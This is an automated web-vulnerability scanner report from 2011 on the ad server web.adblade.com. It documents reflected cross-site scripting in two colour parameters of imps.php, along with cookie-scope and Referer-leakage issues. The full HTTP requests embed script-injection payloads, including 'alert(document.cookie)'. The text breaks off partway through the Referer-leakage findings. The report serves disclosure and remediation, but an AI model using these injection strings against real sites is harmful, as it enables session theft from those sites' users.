web.adblade.com, XSS, Cross Site Scripting

XSS in web.adblade.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Thu Jan 27 08:26:16 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://web.adblade.com/imps.php [description_color parameter]

1.2. http://web.adblade.com/imps.php [title_color parameter]

2. Cookie scoped to parent domain

3. Cross-domain Referer leakage

3.1. http://web.adblade.com/imps.php

3.2. http://web.adblade.com/imps.php

3.3. http://web.adblade.com/imps.php

3.4. http://web.adblade.com/imps.php

3.5. http://web.adblade.com/imps.php

3.6. http://web.adblade.com/imps.php

3.7. http://web.adblade.com/imps.php

3.8. http://web.adblade.com/imps.php

3.9. http://web.adblade.com/imps.php

3.10. http://web.adblade.com/imps.php

4. Cross-domain script include

5. Cookie without HttpOnly flag set

5.1. http://web.adblade.com/imps.php

5.2. http://web.adblade.com/imps.php

6. HTML does not specify charset



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://web.adblade.com/imps.php [description_color parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the description_color request parameter is copied into an HTML comment. The payload c4c7c--><script>alert(1)</script>9472ca4c482 was submitted in the description_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /imps.php?app=905&ad_width=300&ad_height=250&title_font=1&title_color=0066cc&description_font=1&description_color=000000c4c7c--><script>alert(1)</script>9472ca4c482&id=51&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/215/journalregistercompany/300x250/middletown_press_atf?t=1296072885611&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.middletownpress.com%2Farticles%2F2011%2F01%2F26%2Fentertainment%2Fdoc4d3fa2e76b25f513477040.txta5a69%2522style%253d%2522x%253aexpression(alert(1))%25225c0fc6a83d6&refer=http%3A%2F%2Fburp%2Fshow%2F23
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __tuid=3911816417475692493; expires=Tue, 26-Jan-2016 04:25:54 GMT; path=/; domain=.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 04:25:54 GMT
Server: lighttpd/1.4.23
Content-Length: 6868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
font-family:Arial,Helvetica,sans-serif; }
.adDescription1_51, .adDescription1_51:link, .adDescription1_51:visited, .adDescription1_51:hover {
color:#000000c4c7c--><script>alert(1)</script>9472ca4c482; font-family:Arial,Helvetica,sans-serif; }
.adImage1_51 {
}
-->
...[SNIP]...

1.2. http://web.adblade.com/imps.php [title_color parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The value of the title_color request parameter is copied into an HTML comment. The payload ac7d9--><script>alert(1)</script>98529738aff was submitted in the title_color parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /imps.php?app=905&ad_width=300&ad_height=250&title_font=1&title_color=0066ccac7d9--><script>alert(1)</script>98529738aff&description_font=1&description_color=000000&id=51&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/215/journalregistercompany/300x250/middletown_press_atf?t=1296072885611&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.middletownpress.com%2Farticles%2F2011%2F01%2F26%2Fentertainment%2Fdoc4d3fa2e76b25f513477040.txta5a69%2522style%253d%2522x%253aexpression(alert(1))%25225c0fc6a83d6&refer=http%3A%2F%2Fburp%2Fshow%2F23
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __tuid=3911816417461603953; expires=Tue, 26-Jan-2016 04:25:53 GMT; path=/; domain=.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 04:25:53 GMT
Server: lighttpd/1.4.21
Content-Length: 6821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
_51:link, .adTitle1_51:visited, .adTitle1_51:hover,
.adLearnMoreLink1_51, .adLearnMoreLink1_51:link, .adLearnMoreLink1_51:visited, .adLearnMoreLink1_51:hover {
color:#0066ccac7d9--><script>alert(1)</script>98529738aff; font-family:Arial,Helvetica,sans-serif; }
.adDescription1_51, .adDescription1_51:link, .adDescription1_51:visited, .adDescription1_51:hover {
col
...[SNIP]...

2. Cookie scoped to parent domain  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

Request

GET /imps.php?app=905&ad_width=300&ad_height=250&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=51&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/215/journalregistercompany/300x250/middletown_press_atf?t=1296072885611&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.middletownpress.com%2Farticles%2F2011%2F01%2F26%2Fentertainment%2Fdoc4d3fa2e76b25f513477040.txta5a69%2522style%253d%2522x%253aexpression(alert(1))%25225c0fc6a83d6&refer=http%3A%2F%2Fburp%2Fshow%2F23
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __tuid=3911816417521583065; expires=Mon, 25-Jan-2016 20:14:18 GMT; path=/; domain=.adblade.com
Content-type: text/html
Date: Wed, 26 Jan 2011 20:14:18 GMT
Server: lighttpd/1.4.23
Content-Length: 6715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 10 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=3957&ad_width=500&ad_height=300&img_pad=2&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=124&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://markets.dispatch.com/columbusdispatch?6b6c3'-alert(document.cookie)-'83850a93671=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __tuid=3911816417521583065; __qca=P0-806598134-1296072892362; __fc=yUzvsJwZnKlW0v%2FXwZlU6EX8Z8wZ0VLU%2FBSmaePphlqOMou5wNbRICfJisFSuch6XZKzN96P0%2FA9LQma9YM5Ow%3D%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 12:46:42 GMT
Server: lighttpd/1.4.23
Content-Length: 12471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
...[SNIP]...
<td id="adImage" class="adImage1_124" valign="top" align="left"><a class="adTitle1_124" id="adTitle" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=3957" target="_blank"><img src="http://static.cdn.adblade.com/banners/images/100x75/4c8a36978564b.jpg" border="0" />
...[SNIP]...
<div class="adItem1_124" id="_scroll_"><a class="adDescription1_124" id="adDescription_" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=3957" target="_blank">Dallas : Discover the advantages of buying penny stocks...</a>
...[SNIP]...
</table>
<img style="display: none;" src="http://ad.doubleclick.net/ad/N553.151448.ADBLADE/B5039995.10;sz=1x1;pc=[TPAS_ID];ord=1296132402.352982108181?"/>
</td>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

3.2. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=905&ad_width=300&ad_height=250&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=51&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/215/journalregistercompany/300x250/middletown_press_atf?t=1296072885611&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.middletownpress.com%2Farticles%2F2011%2F01%2F26%2Fentertainment%2Fdoc4d3fa2e76b25f513477040.txta5a69%2522style%253d%2522x%253aexpression(alert(1))%25225c0fc6a83d6&refer=http%3A%2F%2Fburp%2Fshow%2F23
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Set-Cookie: __tuid=3911816417741207676; expires=Tue, 26-Jan-2016 04:25:49 GMT; path=/; domain=.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 04:25:49 GMT
Server: lighttpd/1.4.23
Content-Length: 6827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; ch
...[SNIP]...
<td id="adImage" class="adImage1_51" valign="top" align="left"><a class="adTitle1_51" id="adTitle" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=905" target="_blank"><img src="http://static.cdn.adblade.com/banners/images/100x75/4c8a36978564b.jpg" border="0" />
...[SNIP]...
<div class="adItem1_51" id="_scroll0_"><a class="adTitle1_51" id="adTitle" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=905" target="_blank"> Dallas: Easy Investing</a><br /><a class="adDescription1_51" id="adDescription0_" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=905" target="_blank">Dallas : Discover the advantages of buying penny stocks...</a>&nbsp; <a class="adLearnMoreLink1_51" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=905" target="_blank">Learn more</a>
...[SNIP]...
<td id="adImage" class="adImage1_51" valign="top" align="left"><a class="adTitle1_51" id="adTitle" href="http://www.smarterlifestyles.com/2010/08/30/want-to-boost-your-income/?fc_id=18090&fc_app_id=905" target="_blank"><img src="http://static.cdn.adblade.com/banners/images/100x75/3717_4c8a7f6735b90.jpg" border="0" />
...[SNIP]...
<div class="adItem1_51" id="_scroll1_"><a class="adTitle1_51" id="adTitle" href="http://www.smarterlifestyles.com/2010/08/30/want-to-boost-your-income/?fc_id=18090&fc_app_id=905" target="_blank">Boost Your Income</a><br /><a class="adDescription1_51" id="adDescription1_" href="http://www.smarterlifestyles.com/2010/08/30/want-to-boost-your-income/?fc_id=18090&fc_app_id=905" target="_blank">Solidify your expertise with the world...s only University-backed, internet marketing certificate!</a>&nbsp; <a class="adLearnMoreLink1_51" href="http://www.smarterlifestyles.com/2010/08/30/want-to-boost-your-income/?fc_id=18090&fc_app_id=905" target="_blank">Learn more</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

3.3. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=2356&ad_width=240&ad_height=400&title_font=1&title_color=0066cc&description_font=1&description_color=000000&id=59&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://i.total-media.net/jp/tmc/2009/AdBlade/AdBlade240x400ROS.html?dcID=ads.article.1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __tuid=3911816417521583065; __qca=P0-806598134-1296072892362

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Date: Wed, 26 Jan 2011 20:17:40 GMT
Server: lighttpd/1.4.23
Content-Length: 11232

<!-- scroll appears if we set doctype -->
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" href="http://static.cdn.adblade.c
...[SNIP]...
<div style="float:left;" id="adImage" class="adImage1_57">
<a class="adTitle1_57" id="adTitle" href="http://www.smarterlifestyles.com/2010/12/14/the-silent-killer/?fc_id=21389&fc_app_id=2356" target="_blank">
<img src="http://static.cdn.adblade.com/banners/images/80x60/1646_4d07f27a544ee.jpg" border="0" />
...[SNIP]...
</div>
<a class="adTitle1_57" id="adTitle" href="http://www.smarterlifestyles.com/2010/12/14/the-silent-killer/?fc_id=21389&fc_app_id=2356" target="_blank">Why Snoring Can Kill</a>
...[SNIP]...
<br />
<a class="adDescription1_57" href="http://www.smarterlifestyles.com/2010/12/14/the-silent-killer/?fc_id=21389&fc_app_id=2356" target="_blank">Snoring is a silent killer. Stop your snoring tonight...</a>&nbsp; <a class="adLearnMoreLink1_57" href="http://www.smarterlifestyles.com/2010/12/14/the-silent-killer/?fc_id=21389&fc_app_id=2356" target="_blank">Learn more</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

3.4. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=3957&ad_width=500&ad_height=300&img_pad=2&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=124&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://markets.dispatch.com/columbusdispatch?6b6c3'-alert(document.cookie)-'83850a93671=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-806598134-1296072892362; __fc=yUzvsJwZnKlW0v%2FXwZlU6EX8Z8wZ0VLU%2FBSmaePphlqOMou5wNbRICfJisFSuch6XZKzN96P0%2FA9LQma9YM5Ow%3D%3D; __tuid=3911816417148998155

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 13:24:01 GMT
Server: lighttpd/1.4.21
Content-Length: 12435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
...[SNIP]...
</table>
<img style="display: none;" src="http://ad.doubleclick.net/ad/N553.151448.ADBLADE/B5039995.10;sz=1x1;pc=[TPAS_ID];ord=1296134641.017578885881?"/>
</td>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

3.5. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=3957&ad_width=500&ad_height=300&img_pad=2&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=124&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://markets.dispatch.com/columbusdispatch?6b6c3'-alert(document.cookie)-'83850a93671=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-806598134-1296072892362; __fc=yUzvsJwZnKlW0v%2FXwZlU6EX8Z8wZ0VLU%2FBSmaePphlqOMou5wNbRICfJisFSuch6XZKzN96P0%2FA9LQma9YM5Ow%3D%3D; __tuid=3911816417148998155

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 13:54:44 GMT
Server: lighttpd/1.4.21
Content-Length: 12426

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
...[SNIP]...
<td id="adImage" class="adImage1_124" valign="top" align="left"><a class="adTitle1_124" id="adTitle" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=3957" target="_blank"><img src="http://static.cdn.adblade.com/banners/images/100x75/4c8a36978564b.jpg" border="0" />
...[SNIP]...
<div class="adItem1_124" id="_scroll_"><a class="adDescription1_124" id="adDescription_" href="http://www.smarterlifestyles.com/2010/06/01/the-advantages-of-buying-penny-stocks/?fc_id=18057&fc_app_id=3957" target="_blank">Dallas : Discover the advantages of buying penny stocks...</a>
...[SNIP]...
</table>
<img style="display: none;" src="http://ad.doubleclick.net/ad/N553.151448.ADBLADE/B5039995.10;sz=1x1;pc=[TPAS_ID];ord=1296136484.538985735738?"/>
</td>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=8&c2=6864322&c3=&c4=&c5=&c6=&c10=&c15=&cj=1" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-b8GPCpJxfqYm2.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
...[SNIP]...

3.6. http://web.adblade.com/imps.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /imps.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /imps.php?app=3957&ad_width=500&ad_height=300&img_pad=2&title_font=1&title_color=000000&description_font=1&description_color=0066cc&id=124&output=html HTTP/1.1
Host: web.adblade.com
Proxy-Connection: keep-alive
Referer: http://markets.dispatch.com/columbusdispatch?6b6c3'-alert(document.cookie)-'83850a93671=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __tuid=3911816417521583065; __qca=P0-806598134-1296072892362; __fc=yUzvsJwZnKlW0v%2FXwZlU6EX8Z8wZ0VLU%2FBSmaePphlqOMou5wNbRICfJisFSuch6XZKzN96P0%2FA9LQma9YM5Ow%3D%3D

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.8
P3P: policyref="http://adblade.com/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Vendor: Adblade LLC | Adblade| http://www.adblade.com
Content-type: text/html
Date: Thu, 27 Jan 2011 02:22:26 GMT
Server: lighttpd/1.4.21
Content-Length: 12437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html;
...[SNIP]...
